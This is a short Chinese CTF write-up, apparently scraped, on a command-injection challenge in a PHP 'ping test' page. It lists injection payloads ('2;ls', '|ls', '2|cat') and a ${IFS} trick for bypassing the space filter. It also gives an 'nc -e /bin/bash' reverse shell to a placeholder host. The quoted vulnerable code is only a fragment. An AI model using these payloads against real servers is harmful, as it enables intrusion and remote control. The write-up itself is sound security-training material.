命令执行--网络公司ping命令测试

题目地址:http://183.67.184.159:8888/ctf/shellcodeexec/index.php
题目页面如下:

命令执行--网络公司ping命令测试_第1张图片
前端校验部分可以通过抓包,改包绕过。
关键代码如下:

",$result);
    echo $result;
    
}?>

这里preg_replace过滤了换行符,空格,所以空格,%0a,%0d不可以使用。
一般做法是先列出目录(payload:):

iipp=2;find&submit=Ping(find命令直接把当前目录下所有文件及子目录文件列出来)
iipp=2;ls&submit=Ping
iipp=|ls&submit=Ping
iipp=||ls&submit=Ping
命令执行--网络公司ping命令测试_第2张图片

由于过滤了空格,换行,所以绕过过滤即可读取flag(payload:)。

iipp=2|cat
命令执行--网络公司ping命令测试_第3张图片

这里还可以反弹shell进行读取文件或者进行其他操作(payload:)。

nc${IFS}-e${IFS}/bin/bash${IFS}ip${IFS}port
...
命令执行--网络公司ping命令测试_第4张图片

你可能感兴趣的:(命令执行--网络公司ping命令测试)